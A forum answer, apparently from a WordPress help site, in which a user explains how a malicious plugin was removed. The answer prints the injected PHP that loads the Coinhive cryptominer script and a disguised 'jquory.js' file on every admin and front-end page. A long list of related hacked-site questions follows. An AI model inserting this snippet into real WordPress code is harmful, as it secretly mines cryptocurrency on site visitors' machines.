malware in wordpress installer on dreamhost. [closed]

I found the problem..

Answering for others who might have gotten this…

There is this code embedded in one of the plugins

function enqueue_my_scripts() {
wp_enqueue_script( 'wp-internal', 'https://coinhive.com/lib/coinhive.min.js', false, false, true );
wp_enqueue_script( 'wp-backend', plugins_url() . '/LayerSlider/assets/js/jquory.js', false, false, true );

}
add_action( 'admin_enqueue_scripts', 'enqueue_my_scripts' );
add_action( 'wp_enqueue_scripts', 'enqueue_my_scripts' );

And this javascript file Jquory.js.

Just remove the code above and the js file. The problem will be gone.

Cheers.

Related Posts:

  1. What’s the effect if this malware if infected your WP?
  2. Malware on site [closed]
  3. How to find the backdoor of the hack
  4. My wordpress site was hacked – is my htaccess file compromised?
  5. My WordPress Blog sends malicious traffic to other sites [closed]
  6. Hacked WordPress website, as notified by Google Search Console, what to do? [closed]
  7. How was my WP site hacked [closed]
  8. If a WP install is hacked, can it spread to other domains on a server?
  9. Find and Replace text in the entire table using a MySQL query
  10. Is it a good idea to rename the “index.php” in “wp-admin” folder to avoid being hacked?
  11. How to fight this wp-info.php exploit? [closed]
  12. Prevent Hacking of WordPress Site [closed]
  13. Suspicious URLs being loaded after hack and restore
  14. Server hacked: correct contents of wp-uploads directory? [closed]
  15. Site hacked with malware [closed]
  16. Copy wordpress website pages and content
  17. How do I know if my WP Theme is using infamous TimThumb?
  18. Spam pages hack? [closed]
  19. Check for malicious code?
  20. Why would a hacker add this code to each post, and how to do mass cleanup?
  21. Is the current spate of hacks related to the recent security fix?
  22. I have removed the malware from our website however, when I tried again to search the word from Google it is still there [closed]
  23. Have I been hacked? Mysterious code at the top of theme files [closed]
  24. Strange codes in my wordpress site and my website is running too slow [closed]
  25. Spam Content Serving from old cached version of site?
  26. How to solve wordpress redirection (no malware was found)?
  27. Help determining if the following are legitimate files
  28. My blog was hacked? WP posting random posts
  29. Have I been hacked – getting new site setup email for 8 localhost wordpress sites
  30. Site Hacked – WordPress Divi Site – Cannot find where to fix the issue? [closed]
  31. Where I can find a list of WordPress security risks?
  32. looking for indoxploit hack solution [closed]
  33. Why functions.php file automatically empty?
  34. Bruteforce attack from 127.0.0.1?
  35. WordPress installer attack
  36. Why wordpress is hitting another url
  37. Where do hackers usually run their hacking script? [closed]
  38. Malicious Code in Index.php WordPress [closed]
  39. WP Site Hacked, Serp Google Spam [closed]
  40. My site appears to be hacked [closed]
  41. WordPress Redirect Hack
  42. Strings of malicious code to look for after a hack
  43. Hacked/cloaked sitemap [closed]
  44. Verifying that I have fully removed a WordPress hack?
  45. If a hacker changed the blog_charset to UTF-7 does that make WordPress vulnerable to further attacks?
  46. Scanning Database for malicious Data
  47. How Attackers write script into my php files?
  48. Is this a hacking script in function.php?
  49. Websites defaced by uploading script using theme editor
  50. How can I find security hole in my wordpress site?
  51. Has anyone experience w/ WordPress (MultiSite) hidden users (possibly hacked)?
  52. Restrict access to xmlrpc.php
  53. How to prevent bot or someone to modify any file automatically?
  54. How do i disable/disallow and tags in TinyMCE?
  55. hSite has no css on mobile [closed]
  56. How to mass delete one line from all posts after site hack
  57. Unfamiliar query string in Google Search Console URL not found
  58. Strange gibberish JavaScript in Editor – site hacked?
  59. wp-config.php modified?
  60. Suspicious Files
  61. Invisible spam post in backend
  62. Files automatically added
  63. You appear to have already installed WordPress. To reinstall please clear your old database tables first
  64. sitemap contains weird links and does not contain my pages [closed]
  65. Malware script in database post table only? [closed]
  66. New user is assigned 2 roles: customer and superadmin
  67. Hacked WordPress website /Homepage redirect [closed]
  68. WordPress Footer Missing After Website Hack
  69. wp-admin folder removed by hacker [closed]
  70. What is this code in my theme’s footer.php causing chmod permission warnings? [closed]
  71. My WordPress website was hacked [closed]
  72. Hack-Proof OR Security in WordPress — is it real?
  73. How to find exploited wordpress plugin [closed]
  74. Is wp-app.php or wp-apps.php needed for WordPress?
  75. What can I do when an outside party hacks into my weblog and changes my display name?
  76. Troll the hackers by redirecting them
  77. Any known bugs that could cause disappearance of the wp_users table?
  78. On new server, site got hacked, permissions a bit strange? Please help
  79. malware undetectable by multiple scans
  80. WordPress Hacked 5.5 admin-ajax.php [closed]
  81. Is there a simple way to set wordpress site files back to out of the box?
  82. Can’t access htaccess [closed]
  83. Replace domain in database
  84. Admin user lacks admin permissions after hack and can’t reinstate
  85. Website Got Hacked – Fixed – Now Cannot Activate Theme
  86. Username was changed to “admin”
  87. WordPress disable direct access of files in WordPress installation path
  88. Am receiving more than thousand mails in single day from ‘[email protected]’ continuously
  89. Is this a hack? WordPress Usernames of every website we have changed into one single name automatically?
  90. Should I prevent access to .htaccess and wp-config.php files?
  91. Javascript Injection on my WordPress Site
  92. After being hacked Fatal error: Call to undefined function get_header() in 404.php on line 1
  93. Could a user account with a stolen password compromised entire WP site?
  94. how to find the way they hacked my WP site
  95. suspicious boolean.php file in wp web root [closed]
  96. How to remove content from hacked pages? [closed]
  97. My WP site and password was hacked, what to do? [closed]
  98. My WordPress site hacked with unwanted popups [closed]
  99. Should WordPress Add Options to Enhance Security or Leave it to plugin developers? [closed]
  100. WordPress Hacks/Defacing [closed]
error code: 523